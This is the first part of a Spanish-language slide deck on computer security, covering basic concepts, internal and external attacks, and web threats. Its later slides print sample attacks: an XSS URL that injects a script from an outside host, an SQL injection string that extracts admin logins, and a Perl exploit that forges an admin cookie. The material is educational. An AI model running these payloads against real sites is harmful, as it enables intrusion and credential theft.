Descargar

Seguridad informática II

Enviado por Pablo Turmero


Partes: 1, 2

    edu.red

    Seguridad Informática

    – Fundamentos de la seguridad informática

    – Seguridad en ambiente de servidores

    – Seguridad en plataformas Web

    – Cómo proteger las redes Wi-Fi

    – Recomendaciones generales para Internet

    edu.red

    Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA CONFIDENCIALIDAD INTEGRIDAD DISPONIBILIDAD AUTENTICIDAD

    edu.red

    Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA No existe la absoluta seguridad !!

    Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero también una caja fuerte de titanio. ¿Qué es más seguro: la caja de vidrio o la de titanio?

    Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla.

    Todo se puede vulnerar. La única razón por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea más lento.

    edu.red

    Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA Entonces, ¿Cómo nos protegemos de la forma más eficiente posible? Determinando que queremos proteger (ej: Hardware, datos privados, datos públicos, sistemas, etc)? Estableciendo prioridades de los factores a proteger Formando políticas de seguridad Manteniendo la seguridad en el tiempo

    edu.red

    Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA Debemos enfocarnos en REDUCIR EL RIESGO, y no en tratar de eliminar las amenazas, ya que es imposible.

    Para eso debemos saber de QUE o QUIENES nos protegemos y también COMO nos atacan.

    edu.red

    Seguridad Informática SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    edu.red

    Seguridad Informática Ataques Internos

    – Premeditación (Empleados mal intencionados o ex empleados con información privilegiada)? – Descuido – Ignorancia – Indiferencia de las politicas de seguridad

    Ataques externos

    Hackers, Crackers, Lammers, Script-Kiddies – Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.

    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    edu.red

    Seguridad Informática Ataques Internos

    Suplantación de identidad Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)? Robo de información (Ej: para la competencia)? Virus, Troyanos, Gusanos Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc Keylogging – Keycatching Keycatcher: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    edu.red

    Seguridad Informática Ataques Externos

    Ataques contra servicios WEB Cross Site Scripting (XSS)? SQL Injection Exploits Robo de Identidad Denegación de Servicio (DoS) y Denegación de Servicio Distribuido (DDoS)? SPAM VIRUS Phishing (Whishing, Hishing)? Troyanos SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    edu.red

    Seguridad Informática XSS SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    edu.red

    Seguridad Informática XSS:

    http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='//h4k.in/i.js';document.body.appendChild(a);//';alert(1)//%22;alert(2)//%22;alert(3)//–%3E

    SQL Injection:

    http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM admin_login– SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    edu.red

    Seguridad Informática #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host=shift; if ($host eq "") { print "Usage: webeye-xp.pl < host name>n"; exit; } my $browser = LWP::UserAgent->new(); my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;"); $t = $resp->content; #print $t; "; Ejemplo de un exploit en PERL: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Partes: 1, 2
    Página siguiente